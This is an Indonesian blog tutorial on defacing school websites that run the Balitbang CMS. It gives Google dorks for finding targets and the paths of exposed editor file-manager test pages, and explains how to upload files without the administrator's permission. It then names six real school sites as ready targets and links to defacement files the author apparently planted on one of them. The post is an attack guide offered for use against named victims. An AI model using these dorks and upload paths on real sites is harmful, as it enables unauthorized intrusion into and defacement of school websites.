Home » » Deface dengan CMS Balitbang file Upload

Deface dengan CMS Balitbang file Upload

Written By Sumitro Aji Prabowo on Senin, 13 Mei 2013 | 02.31




CMS ini dikembangkan oleh Balitbang Kemendiknas makanya lebih terkenal dengan sebutan CMS Balitbang. Balitbang ini ditunjukan untuk kepentingan dunia pendidikan Indonesia terutama untuk sekolah sekolah yang belum punya Website Sekolahnya. Harapannya kedepan Balitbang menginginkan semua sekolah di Indonesia punya Sistem Informasi Berbasis Website yang bisa diakses oleh banyak orang.

Oh ya, sebelumnya saya juga pernah nulis artikel berkaitan dengan CMS yaitu CMS Lokomedia yang sudah bebarapa hari yang lalu dan hampir satu minggu. Tetapi kali ini saya mencoba menjelaskan tentang CMS Balitbang. Tutorial ini sudah banyak di google, karena tutorial ini sudah lama namun masih berlaku. Maka dari itu saya menulis tutorial ini dan dikembangkan secara lengkap serta singkat tutornya tidak kebingungan untuk yang para newbie seperti saya. Langsung saya akan jelaskan lebih mudah.


Dork : inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Anda cari targetnya di google dengan kode diatas, atau langsung saja di klik link diatas dan langsung menuju ke google untuk mencarinya. Kalau sudah anda temukan web yang sekiranya pantas dan bisa dijadikan target, lalu masukan kode ini tepat dibelakang setelah nama alamat webnya.


editor/filemanager/connectors/uploadtest.html
editor/filemanager/connectors/test.html

Kalau anda tidak mengerti, contoh seperti ini.

http://www.target.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.target.sch.id/editor/filemanager/connectors/test.html

Setelah sudah, lalu pada options ASP diganti menjadi PHP. Kemudian anda boleh upload file tanpa harus izin dari admin webnya, file yang bisa diupload adalah 7z, aiff, asf, avi, bmp, csv, doc, fla, flv, gif, gz, gzip, jpeg, jpg, mid, mov, mp3, mp4, mpc, mpeg, mpg, ods, odt, pdf, png, ppt, pxd, qt, ram, rar, rm, rmi, rmvb, rtf, sdc, sitd, swf, sxc, sxw, tar, tgz, tif, tiff, txt, vsd, wav, wma, wmv, xls, xml, zip. Jika sudah diupload, file bisa anda temukan dengan cara klik Get Folders | Get Folders and Files atau contoh disini menggunakan TXT.


http://www.target.sch.id/userfiles/file/file.txt

Sekian tutor kali ini yang bisa saya bagikan untuk yang belum mengetahui atau ingin belajar saja. Jika anda malas mencari target, berikut ada beberapa target yang ada tempat buat uploadnya yang saya jumpai di mesin pencari.

http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.sman10samarinda.sch.id/editor/filemanager/connectors/test.html
http://www.smpn10tarakan.sch.id/editor/filemanager/connectors/test.html
http://sman6bdg.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html

Dan yang terakhir ada contoh dari saya untuk anda.

text => http://www.sman1gombong.sch.id/userfiles/file/imcyber-team.txt
image => http://www.sman1gombong.sch.id/userfiles/image/indramayucyberteam.jpg

Sumber Artikel: http://imcyber-team.blogspot.com/

1 komentar:

Like us on Facebook
Follow us on Twitter
Recommend us on Google Plus